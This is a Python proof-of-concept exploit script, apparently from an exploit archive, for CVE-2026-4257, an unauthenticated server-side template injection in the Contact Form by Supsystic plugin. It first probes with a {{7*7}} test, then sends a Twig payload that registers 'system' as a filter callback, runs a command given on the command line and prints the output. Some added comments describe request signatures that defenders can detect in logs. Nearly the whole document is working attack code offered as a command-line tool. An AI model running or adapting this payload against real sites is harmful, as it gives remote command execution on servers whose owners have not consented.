## https://sploitus.com/exploit?id=PACKETSTORM:220753
import requests
    import argparse
    import re
    import urllib.parse
    
    def check_ssti(url, field_name):
        """Probe *url* for template evaluation through the ``cfsPreFill`` parameter.

        Sends ``{{7*7}}`` as the value of the query parameter named *field_name*
        together with ``cfsPreFill=1`` and treats the substring ``"49"`` anywhere
        in the response body as a positive result.

        Args:
            url: Page URL hosting the form; the query string is appended to it.
            field_name: Form field name used as the query-parameter key.

        Returns:
            True when ``"49"`` occurs in the response text, False otherwise.
            Any exception from the request is printed and reported as False.
        """
        print(f"[*] Testing SSTI on {url} with field {field_name}...")
        
        # Simple arithmetic test
        # Defender note: the observable signature of this probe is a GET request
        # carrying cfsPreFill=1 plus a form-field parameter whose value contains
        # "{{" / "}}" — that pair is what request logs and WAF rules can key on.
        test_payload = "{{7*7}}"
        params = {
            "cfsPreFill": "1",
            field_name: test_payload
        }
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            # verify=False disables TLS certificate validation for this request.
            response = requests.get(target_url, verify=False, timeout=10)
            # Plain substring match: a "49" that occurs elsewhere in the page
            # (dates, IDs, prices) also counts, so this is a weak indicator.
            if "49" in response.text:
                print("[+] SSTI confirmed! Found '49' in response.")
                return True
            else:
                print("[-] SSTI test failed. '49' not found in response.")
                return False
        except Exception as e:
            # Every failure (connection, timeout, parsing) is collapsed into False.
            print(f"[-] Error: {e}")
            return False
    
    def trigger_rce(url, field_name, command):
        """Send the two-step filter-callback template payload and scan the reply.

        The template expression is placed in *field_name*; the ``last_name`` and
        ``email`` parameters carry the values the expression reads back via
        ``forms.params.fields.1.value`` / ``forms.params.fields.2.value``.
        Afterwards the response is searched for a ``fields[<field_name>]`` input
        whose ``value`` attribute is non-empty, and that attribute is printed.

        Args:
            url: Page URL hosting the form; the query string is appended to it.
            field_name: Form field name that receives the template expression.
            command: String placed in the ``email`` parameter.

        Returns:
            True when the ``value`` attribute was found, False otherwise.
            Any exception from the request is printed and reported as False.
        """
        print(f"[*] Triggering RCE: {command}")
        
        # Payload to register system as a filter callback and then call it
        # We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
        # last_name will be 'system', email will be the command
        # Defender note: the request therefore contains both "_self.env." inside a
        # form-field parameter and the literal "system" in last_name — a pairing
        # that does not occur in legitimate prefill traffic.
        payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
        
        params = {
            "cfsPreFill": "1",
            field_name: payload,
            "last_name": "system",
            "email": command
        }
        
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            # verify=False disables TLS certificate validation for this request.
            response = requests.get(target_url, verify=False, timeout=10)
            print(f"[*] Response Status: {response.status_code}")
            
            # Look for common patterns in the response that might indicate success
            # The output usually appears in the 'value' attribute of the first field
            # NOTE(review): field_name is interpolated into the pattern verbatim,
            # so it is assumed to contain no regex metacharacters.
            match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
            if match:
                print(f"[!] RCE SUCCESS! Output:")
                print(f"----------------------------------------")
                print(match.group(1))
                print(f"----------------------------------------")
                return True
            else:
                # A missing match does not prove the expression was not evaluated;
                # only that the expected input element was not found.
                print("[-] Could not find command output in response. Check the response body manually.")
                return False
        except Exception as e:
            # Every failure (connection, timeout, parsing) is collapsed into False.
            print(f"[-] Error: {e}")
            return False
    
    if __name__ == "__main__":
        # CLI entry point: print the banner, parse -u/-f/-c, run the arithmetic
        # probe first and only then send the callback payload.
        # The banner states the affected range as <= 1.7.36; versions above that
        # are outside the range this script targets.
        print("""
    CVE-2026-4257
    Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
    
    -------------------------------------------------
        """)
        
        parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
        parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
        parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
        # Default is "whoami"; the value is passed through unchanged as the email parameter.
        parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
        
        args = parser.parse_args()
        
        # trigger_rce is gated on the probe's substring check, so a page that
        # merely contains "49" will also reach the second request.
        if check_ssti(args.url, args.field):
            trigger_rce(args.url, args.field, args.cmd)